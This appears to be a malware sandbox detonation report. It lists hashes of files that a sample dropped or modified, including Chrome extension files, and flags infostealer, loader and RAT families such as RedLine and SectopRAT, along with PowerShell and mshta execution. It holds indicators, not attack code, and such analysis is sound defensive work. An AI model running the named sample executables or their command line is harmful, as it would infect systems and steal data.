SHA256 f41862665b13c0b4c4f562ef1743684cce29d4bcf7fe3ea494208df253e33885
SHA512 01f305a280112482884485085494e871c66d40c0b03de710b4e5f49c6a478d541c2c1fda2ceaf4307900485946dee9d905851e98a2eb237642c80d464d1b3ada

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\iw\messages.json

MD5 26b1533c0852ee4661ec1a27bd87d6bf
SHA1 18234e3abaf702df9330552780c2f33b83a1188a
SHA256 bbb81c32f482ba3216c9b1189c70cef39ca8c2181af3538ffa07b4c6ad52f06a
SHA512 450bfaf0e8159a4fae309737ea69ca8dd91caafd27ef662087c4e7716b2dcad3172555898e75814d6f11487f4f254de8625ef0cfea8df0133fc49e18ec7fd5d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ja\messages.json

MD5 15ec1963fc113d4ad6e7e59ae5de7c0a
SHA1 4017fc6d8b302335469091b91d063b07c9e12109
SHA256 34ac08f3c4f2d42962a3395508818b48ca323d22f498738cc9f09e78cb197d73
SHA512 427251f471fa3b759ca1555e9600c10f755bc023701d058ff661bec605b6ab94cfb3456c1fea68d12b4d815ffbafabceb6c12311dd1199fc783ed6863af97c0f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ka\messages.json

MD5 83f81d30913dc4344573d7a58bd20d85
SHA1 5ad0e91ea18045232a8f9df1627007fe506a70e0
SHA256 30898bbf51bdd58db397ff780f061e33431a38ef5cfc288b5177ecf76b399f26
SHA512 85f97f12ad4482b5d9a6166bb2ae3c4458a582cf575190c71c1d8e0fb87c58482f8c0efead56e3a70edd42bed945816db5e07732ad27b8ffc93f4093710dd58f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\kk\messages.json

MD5 2d94a58795f7b1e6e43c9656a147ad3c
SHA1 e377db505c6924b6bfc9d73dc7c02610062f674e
SHA256 548dc6c96e31a16ce355dc55c64833b08ef3fba8bf33149031b4a685959e3af4
SHA512 f51cc857e4cf2d4545c76a2dce7d837381ce59016e250319bf8d39718be79f9f6ee74ea5a56de0e8759e4e586d93430d51651fc902376d8a5698628e54a0f2d8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\kn\messages.json

MD5 38be0974108fc1cc30f13d8230ee5c40
SHA1 acf44889dd07db97d26d534ad5afa1bc1a827bad
SHA256 30078ef35a76e02a400f03b3698708a0145d9b57241cc4009e010696895cf3a1
SHA512 7bdb2bade4680801fc3b33e82c8aa4fac648f45c795b4bace4669d6e907a578ff181c093464884c0e00c9762e8db75586a253d55cd10a7777d281b4bffafe302

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ko\messages.json

MD5 f3e59eeeb007144ea26306c20e04c292
SHA1 83e7bdfa1f18f4c7534208493c3ff6b1f2f57d90
SHA256 c52d9b955d229373725a6e713334bbb31ea72efa9b5cf4fbd76a566417b12cac
SHA512 7808cb5ff041b002cbd78171ec5a0b4dba3e017e21f7e8039084c2790f395b839bee04ad6c942eed47ccb53e90f6de818a725d1450bf81ba2990154afd3763af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\lo\messages.json

MD5 e20d6c27840b406555e2f5091b118fc5
SHA1 0dcecc1a58ceb4936e255a64a2830956bfa6ec14
SHA256 89082fb05229826bc222f5d22c158235f025f0e6df67ff135a18bd899e13bb8f
SHA512 ad53fc0b153005f47f9f4344df6c4804049fac94932d895fd02eebe75222cfe77eedd9cd3fdc4c88376d18c5972055b00190507aa896488499d64e884f84f093

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\lt\messages.json

MD5 970544ab4622701ffdf66dc556847652
SHA1 14bee2b77ee74c5e38ebd1db09e8d8104cf75317
SHA256 5dfcbd4dfeaec3abe973a78277d3bd02cd77ae635d5c8cd1f816446c61808f59
SHA512 cc12d00c10b970189e90d47390eeb142359a8d6f3a9174c2ef3ae0118f09c88ab9b689d9773028834839a7dfaf3aac6747bc1dcb23794a9f067281e20b8dc6ea

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\lv\messages.json

MD5 a568a58817375590007d1b8abcaebf82
SHA1 b0f51fe6927bb4975fc6eda7d8a631bf0c1ab597
SHA256 0621de9161748f45d53052ed8a430962139d7f19074c7ffe7223ecb06b0b87db
SHA512 fcfbadec9f73975301ab404db6b09d31457fac7ccad2fa5be348e1cad6800f87cb5b56de50880c55bbadb3c40423351a6b5c2d03f6a327d898e35f517b1c628c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ml\messages.json

MD5 4717efe4651f94eff6acb6653e868d1a
SHA1 b8a7703152767fbe1819808876d09d9cc1c44450
SHA256 22ca9415e294d9c3ec3384b9d08cdaf5164af73b4e4c251559e09e529c843ea6
SHA512 487eab4938f6bc47b1d77dd47a5e2a389b94e01d29849e38e96c95cabc7bd98679451f0e22d3fea25c045558cd69fddb6c4fef7c581141f1c53c4aa17578d7f7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\mn\messages.json

MD5 83e7a14b7fc60d4c66bf313c8a2bef0b
SHA1 1ccf1d79cded5d65439266db58480089cc110b18
SHA256 613d8751f6cc9d3fa319f4b7ea8b2bd3bed37fd077482ca825929dd7c12a69a8
SHA512 3742e24ffc4b5283e6ee496813c1bdc6835630d006e8647d427c3de8b8e7bf814201adf9a27bfab3abd130b6fec64ebb102ac0eb8dedfe7b63d82d3e1233305d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\mr\messages.json

MD5 3b98c4ed8874a160c3789fead5553cfa
SHA1 5550d0ec548335293d962aaa96b6443dd8abb9f6
SHA256 adeb082a9c754dfd5a9d47340a3ddcc19bf9c7efa6e629a2f1796305f1c9a66f
SHA512 5139b6c6df9459c7b5cdc08a98348891499408cd75b46519ba3ac29e99aaafcc5911a1dee6c3a57e3413dbd0fae72d7cbc676027248dce6364377982b5ce4151

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ms\messages.json

MD5 7d273824b1e22426c033ff5d8d7162b7
SHA1 eadbe9dbe5519bd60458b3551bdfc36a10049dd1
SHA256 2824cf97513dc3ecc261f378bfd595ae95a5997e9d1c63f5731a58b1f8cd54f9
SHA512 e5b611bbfab24c9924d1d5e1774925433c65c322769e1f3b116254b1e9c69b6df1be7828141eebbf7524dd179875d40c1d8f29c4fb86d663b8a365c6c60421a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\my\messages.json

MD5 342335a22f1886b8bc92008597326b24
SHA1 2cb04f892e430dcd7705c02bf0a8619354515513
SHA256 243befbd6b67a21433dcc97dc1a728896d3a070dc20055eb04d644e1bb955fe7
SHA512 cd344d060e30242e5a4705547e807ce3ce2231ee983bb9a8ad22b3e7598a7ec87399094b04a80245ad51d039370f09d74fe54c0b0738583884a73f0c7e888ad8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ne\messages.json

MD5 065eb4de2319a4094f7c1c381ac753a0
SHA1 6324108a1ad968cb3aec83316c6f12d51456c464
SHA256 160e1cd593c901c7291ea4ecba735191d793ddfd7e9646a0560498627f61da6f
SHA512 8b3e970a2beb8b6b193ad6ab9baa0fd8e1147cb5b9e64d76a6d3f104d636481621be52c2d72c588adf444e136a9b1350ac767255d2e680df44e9a1fb75e4c898

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\nl\messages.json

MD5 32df72f14be59a9bc9777113a8b21de6
SHA1 2a8d9b9a998453144307dd0b700a76e783062ad0
SHA256 f3fe1ffcb182183b76e1b46c4463168c746a38e461fd25ca91ff2a40846f1d61
SHA512 e0966f5cca5a8a6d91c58d716e662e892d1c3441daa5d632e5e843839bb989f620d8ac33ed3edbafe18d7306b40cd0c4639e5a4e04da2c598331dacec2112aad

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\no\messages.json

MD5 a1744b0f53ccf889955b95108367f9c8
SHA1 6a5a6771dff13dcb4fd425ed839ba100b7123de0
SHA256 21ceff02b45a4bfd60d144879dfa9f427949a027dd49a3eb0e9e345bd0b7c9a8
SHA512 f55e43f14514eecb89f6727a0d3c234149609020a516b193542b5964d2536d192f40cc12d377e70c683c269a1bdcde1c6a0e634aa84a164775cffe776536a961

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pa\messages.json

MD5 97f769f51b83d35c260d1f8cfd7990af
SHA1 0d59a76564b0aee31d0a074305905472f740ceca
SHA256 bbd37d41b7de6f93948fa2437a7699d4c30a3c39e736179702f212cb36a3133c
SHA512 d91f5e2d22fc2d7f73c1f1c4af79db98fcfd1c7804069ae9b2348cbc729a6d2dff7fb6f44d152b0bdaba6e0d05dff54987e8472c081c4d39315cec2cbc593816

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pl\messages.json

MD5 b8d55e4e3b9619784aeca61ba15c9c0f
SHA1 b4a9c9885fbeb78635957296fddd12579fefa033
SHA256 e00ff20437599a5c184ca0c79546cb6500171a95e5f24b9b5535e89a89d3ec3d
SHA512 266589116eee223056391c65808255edae10eb6dc5c26655d96f8178a41e283b06360ab8e08ac3857d172023c4f616ef073d0bea770a3b3dd3ee74f5ffb2296b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pt_BR\messages.json

MD5 608551f7026e6ba8c0cf85d9ac11f8e3
SHA1 87b017b2d4da17e322af6384f82b57b807628617
SHA256 a73eea087164620fa2260d3910d3fbe302ed85f454edb1493a4f287d42fc882f
SHA512 82f52f8591db3c0469cc16d7cbfdbf9116f6d5b5d2ad02a3d8fa39ce1378c64c0ea80ab8509519027f71a89eb8bbf38a8702d9ad26c8e6e0f499bf7da18bf747

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pt_PT\messages.json

MD5 0963f2f3641a62a78b02825f6fa3941c
SHA1 7e6972beab3d18e49857079a24fb9336bc4d2d48
SHA256 e93b8e7fb86d2f7dfae57416bb1fb6ee0eea25629b972a5922940f0023c85f90
SHA512 22dd42d967124da5a2209dd05fb6ad3f5d0d2687ea956a22ba1e31c56ec09deb53f0711cd5b24d672405358502e9d1c502659bb36ced66caf83923b021ca0286

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ro\messages.json

MD5 bed8332ab788098d276b448ec2b33351
SHA1 6084124a2b32f386967da980cbe79dd86742859e
SHA256 085787999d78fadff9600c9dc5e3ff4fb4eb9be06d6bb19df2eef8c284be7b20
SHA512 22596584d10707cc1c8179ed3abe46ef2c314cf9c3d0685921475944b8855aab660590f8fa1cfdce7976b4bb3bd9abbbf053f61f1249a325fd0094e1c95692ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ru\messages.json

MD5 51d34fe303d0c90ee409a2397fca437d
SHA1 b4b9a7b19c62d0aa95d1f10640a5fba628ccca12
SHA256 be733625acd03158103d62bc0eef272ca3f265ac30c87a6a03467481a177dae3
SHA512 e8670ded44dc6ee30e5f41c8b2040cf8a463cd9a60fc31fa70eb1d4c9ac1a3558369792b5b86fa761a21f5266d5a35e5c2c39297f367daa84159585c19ec492a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\si\messages.json

MD5 b8a4fd612534a171a9a03c1984bb4bdd
SHA1 f513f7300827fe352e8ecb5bd4bb1729f3a0e22a
SHA256 54241ebe651a8344235cc47afd274c080abaebc8c3a25afb95d8373b6a5670a2
SHA512 c03e35bfde546aeb3245024ef721e7e606327581efe9eaf8c5b11989d9033bdb58437041a5cb6d567baa05466b6aaf054c47f976fd940eeedf69fdf80d79095b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sk\messages.json

MD5 8e55817bf7a87052f11fe554a61c52d5
SHA1 9abdc0725fe27967f6f6be0df5d6c46e2957f455
SHA256 903060ec9e76040b46deb47bbb041d0b28a6816cb9b892d7342fc7dc6782f87c
SHA512 eff9ec7e72b272dde5f29123653bc056a4bc2c3c662ae3c448f8cb6a4d1865a0679b7e74c1b3189f3e262109ed6bc8f8d2bde14aefc8e87e0f785ae4837d01c7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sl\messages.json

MD5 bfaefeff32813df91c56b71b79ec2af4
SHA1 f8eda2b632610972b581724d6b2f9782ac37377b
SHA256 aab9cf9098294a46dc0f2fa468afff7ca7c323a1a0efa70c9db1e3a4da05d1d4
SHA512 971f2bbf5e9c84de3d31e5f2a4d1a00d891a2504f8af6d3f75fc19056bfd059a270c4c9836af35258aba586a1888133fb22b484f260c1cbc2d1d17bc3b4451aa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sr\messages.json

MD5 7f5f8933d2d078618496c67526a2b066
SHA1 b7050e3efa4d39548577cf47cb119fa0e246b7a4
SHA256 4e8b69e864f57cddd4dc4e4faf2c28d496874d06016bc22e8d39e0cb69552769
SHA512 0fbab56629368eef87deef2977ca51831beb7deae98e02504e564218425c751853c4fdeaa40f51ecfe75c633128b56ae105a6eb308fd5b4a2e983013197f5dba

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sv\messages.json

MD5 90d8fb448ce9c0b9ba3d07fb8de6d7ee
SHA1 d8688cac0245fd7b886d0deb51394f5df8ae7e84
SHA256 64b1e422b346ab77c5d1c77142685b3ff7661d498767d104b0c24cb36d0eb859
SHA512 6d58f49ee3ef0d3186ea036b868b2203fe936ce30dc8e246c32e90b58d9b18c624825419346b62af8f7d61767dbe9721957280aa3c524d3a5dfb1a3a76c00742

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sw\messages.json

MD5 d0579209686889e079d87c23817eddd5
SHA1 c4f99e66a5891973315d7f2bc9c1daa524cb30dc
SHA256 0d20680b74af10ef8c754fcde259124a438dce3848305b0caf994d98e787d263
SHA512 d59911f91ed6c8ff78fd158389b4d326daf4c031b940c399569fe210f6985e23897e7f404b7014fc7b0acec086c01cc5f76354f7e5d3a1e0dedef788c23c2978

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ta\messages.json

MD5 dcc0d1725aeaeaaf1690ef8053529601
SHA1 bb9d31859469760ac93e84b70b57909dcc02ea65
SHA256 6282bf9df12ad453858b0b531c8999d5fd6251eb855234546a1b30858462231a
SHA512 6243982d764026d342b3c47c706d822bb2b0caffa51f0591d8c878f981eef2a7fc68b76d012630b1c1eb394af90eb782e2b49329eb6538dd5608a7f0791fdcf5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\te\messages.json

MD5 385e65ef723f1c4018eee6e4e56bc03f
SHA1 0cea195638a403fd99baef88a360bd746c21df42
SHA256 026c164bae27dbb36a564888a796aa3f188aad9e0c37176d48910395cf772cea
SHA512 e55167cb5638e04df3543d57c8027b86b9483bfcafa8e7c148eded66454aebf554b4c1cf3c33e93ec63d73e43800d6a6e7b9b1a1b0798b6bdb2f699d3989b052

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\th\messages.json

MD5 64077e3d186e585a8bea86ff415aa19d
SHA1 73a861ac810dabb4ce63ad052e6e1834f8ca0e65
SHA256 d147631b2334a25b8aa4519e4a30fb3a1a85b6a0396bc688c68dc124ec387d58
SHA512 56dd389eb9dd335a6214e206b3bf5d63562584394d1de1928b67d369e548477004146e6cb2ad19d291cb06564676e2b2ac078162356f6bc9278b04d29825ef0c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\tr\messages.json

MD5 76b59aaacc7b469792694cf3855d3f4c
SHA1 7c04a2c1c808fa57057a4cceee66855251a3c231
SHA256 b9066a162bee00fd50dc48c71b32b69dffa362a01f84b45698b017a624f46824
SHA512 2e507ca6874de8028dc769f3d9dfd9e5494c268432ba41b51568d56f7426f8a5f2e5b111ddd04259eb8d9a036bb4e3333863a8fc65aab793bcef39edfe41403b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\uk\messages.json

MD5 970963c25c2cef16bb6f60952e103105
SHA1 bbddacfeee60e22fb1c130e1ee8efda75ea600aa
SHA256 9fa26ff09f6acde2457ed366c0c4124b6cac1435d0c4fd8a870a0c090417da19
SHA512 1bed9fe4d4adeed3d0bc8258d9f2fd72c6a177c713c3b03fc6f5452b6d6c2cb2236c54ea972ece7dbfd756733805eb2352cae44bab93aa8ea73bb80460349504

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ur\messages.json

MD5 8b4df6a9281333341c939c244ddb7648
SHA1 382c80cad29bcf8aaf52d9a24ca5a6ecf1941c6b
SHA256 5da836224d0f3a96f1c5eb5063061aad837ca9fc6fed15d19c66da25cf56f8ac
SHA512 fa1c015d4ea349f73468c78fdb798d462eef0f73c1a762298798e19f825e968383b0a133e0a2ce3b3df95f24c71992235bfc872c69dc98166b44d3183bf8a9e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\vi\messages.json

MD5 773a3b9e708d052d6cbaa6d55c8a5438
SHA1 5617235844595d5c73961a2c0a4ac66d8ea5f90f
SHA256 597c5f32bc999746bc5c2ed1e5115c523b7eb1d33f81b042203e1c1df4bbcafe
SHA512 e5f906729e38b23f64d7f146fa48f3abf6baed9aafc0e5f6fa59f369dc47829dbb4bfa94448580bd61a34e844241f590b8d7aec7091861105d8ebb2590a3bee9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zh_CN\messages.json

MD5 3e76788e17e62fb49fb5ed5f4e7a3dce
SHA1 6904ffa0d13d45496f126e58c886c35366efcc11
SHA256 e72d0bb08cc3005556e95a498bd737e7783bb0e56dcc202e7d27a536616f5ee0
SHA512 f431e570ab5973c54275c9eef05e49e6fe2d6c17000f98d672dd31f9a1fad98e0d50b5b0b9cf85d5bbd3b655b93fd69768c194c8c1688cb962aa75ff1af9bdb6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zh_HK\messages.json

MD5 524e1b2a370d0e71342d05dde3d3e774
SHA1 60d1f59714f9e8f90ef34138d33fbff6dd39e85a
SHA256 30f44cfad052d73d86d12fa20cfc111563a3b2e4523b43f7d66d934ba8dace91
SHA512 d2225cf2fa94b01a7b0f70a933e1fdcf69cdf92f76c424ce4f9fcc86510c481c9a87a7b71f907c836cbb1ca41a8bebbd08f68dbc90710984ca738d293f905272

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zh_TW\messages.json

MD5 0e60627acfd18f44d4df469d8dce6d30
SHA1 2bfcb0c3ca6b50d69ad5745fa692baf0708db4b5
SHA256 f94c6ddedf067642a1af18d629778ec65e02b6097a8532b7e794502747aeb008
SHA512 6ff517eed4381a61075ac7c8e80c73fafae7c0583ba4fa7f4951dd7dbe183c253702dee44b3276efc566f295dac1592271be5e0ac0c7d2c9f6062054418c7c27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_metadata\verified_contents.json

MD5 f897300492e3ab467e56883d23d02d77
SHA1 decd6dc9e70eccf9b45983147680614c019b99ea
SHA256 f9b3a5747dedcb5aed58fcfc0f4fd3bd2f2e903f2ccef90a92a73dbc0f8c3dbd
SHA512 b8ac574e24814baf04a264e7f3f00b4285cd7b66104dfc77897440a898fca5230775300ec7def723678975a04c2cd1bc73a44f77da26262e8704029930990c62

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\service_worker_bin_prod.js

MD5 4e0c47897bf98deac56f800942e150c4
SHA1 7903d30e0acee273724bdaa67446d9fd4e8460a5
SHA256 fe76ea0c2f81e6140f38f4143b40be85014b93ff80737600cfb39aeb5c8c6537
SHA512 8b31463fc683439bab5d4aefe2be0f6a9f5b695c2d95aff3f842bfc74b10ae3d386d288121161506f74a08fb86d25c1096da4177b768254bf84e83983982640f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\page_embed_script.js

MD5 3ab0cd0f493b1b185b42ad38ae2dd572
SHA1 079b79c2ed6f67b5a5bd9bc8c85801f96b1b0f4b
SHA256 73e3888ccbc8e0425c3d2f8d1e6a7211f7910800eede7b1e23ad43d3b21173f7
SHA512 32f9db54654f29f39d49f7a24a1fc800dbc0d4a8a1bab2369c6f9799bc6ade54962eff6010ef6d6419ae51d5b53ec4b26b6e2cdd98def7cc0d2adc3a865f37d3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\offscreendocument_main.js

MD5 9d0ef4f7cb0306dcb7a7cdcd6dc2ccc7
SHA1 88d7f0a88c5807bfe00f13b612cc0522eebe514a
SHA256 e5e4392b21a21ecafd27707bf70f95961b2656735a20b40ba54479d40eab063c
SHA512 34cd9af9199de606a531e98db82beaa5552e59bccb2ab2bf49f82d6fa05425eb6936bc5f03bfc421ab6980b91395d9fdc5f0776882e1d49b3217cd35641ff906

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\offscreendocument.html

MD5 b747b5922a0bc74bbf0a9bc59df7685f
SHA1 7bf124b0be8ee2cfcd2506c1c6ffc74d1650108c
SHA256 b9fa2d52a4ffabb438b56184131b893b04655b01f336066415d4fe839efe64e7
SHA512 7567761be4054fcb31885e16d119cd4e419a423ffb83c3b3ed80bfbf64e78a73c2e97aae4e24ab25486cd1e43877842db0836db58fbfbcef495bc53f9b2a20ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\128.png

MD5 35696aba596d5b8619a558dd05b4ad40
SHA1 7ecc1dad332847b08c889cb35dda9d4bae85dea8
SHA256 75da533888189d13fc340d40637b9fc07a3f732e3fcf33ec300f4c7268790a62
SHA512 c32f20865f736b772844aaa44572369e7ae85b9f2f17f87d61694acc54487309a32bc4830ed8d9cee8b593babecf728c1ea33c2b9588649be0e4f1e6ed7ee753

memory/4600-1466-0x0000000002FE0000-0x0000000003072000-memory.dmp

memory/4600-1468-0x0000000003C80000-0x0000000003D0B000-memory.dmp

memory/4600-1467-0x0000000003080000-0x0000000003C7B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 dbb82e68eeac2e88c0ac1ff642efa422
SHA1 908106c09b6bf4f4e09d222482721ddb59716355
SHA256 d95429bf2f39fb59de22b2880df936e8f78b73114e1433dd0a78f4e16e0d01fb
SHA512 3f4dc10985f90bfdca4c75076f9264436111c1ca124fbb208b80b2e66d8b17d0f343e77ee8bed738e768fc8ee4e81693c9611ba34287eabd49be6cde06eb5c65

memory/4600-1488-0x0000000003D20000-0x0000000003DA7000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 f5c377de6e861a66797927c073ec3b28
SHA1 3e252007a19b6af8343dae2c475848d7a12fa030
SHA256 7bc1bd121650caf938679c0b19f79454180e55dbe3f38fc15809d0e4439ff8b1
SHA512 fea38faad677d290075cd641c12cc73f2aa138fac2152052c0026c52f452f92e5fef2e1ab2122f8f8031dc5f7c25cfc2dd94abcb70d1f4b904dafddf42dd0f1f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

MD5 2213da253ef261f32b9ddea80d893644
SHA1 1d75ee795fcd6df4d644b64dab4f4f272de64995
SHA256 ddcb0ce2a46443789660d6cb7e3b43609c3c3e6c2df837258d15439f64ce2619
SHA512 7b1d405e19d139a80dc84a2b3232ce872cc2e9bd912305ac7323150b7e85439d3e8fe1d0ede506eed5186058604389fb688e927cda0de94fb5553e31f6e1f0dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\248ebf1d-91d8-4134-a61a-3572021266c4.dmp

MD5 eda928f17c575fc9d695a53d059ea071
SHA1 920d7bb0e269b283fc58170f0d553bb0bfc9abd2
SHA256 1fc0f33c5c96119cef47ea56e24eec4b36e571750e3cc7233fa6658f90c732ac
SHA512 f7176286b06c4316910a715111e2991f40276a57cd0afcf0890427cd2bfc0bab81f9553a6d7facd85edd925f579dd0935d3ddbca7f5749a7172f2f09ccb48dbd

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

79s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe N/A
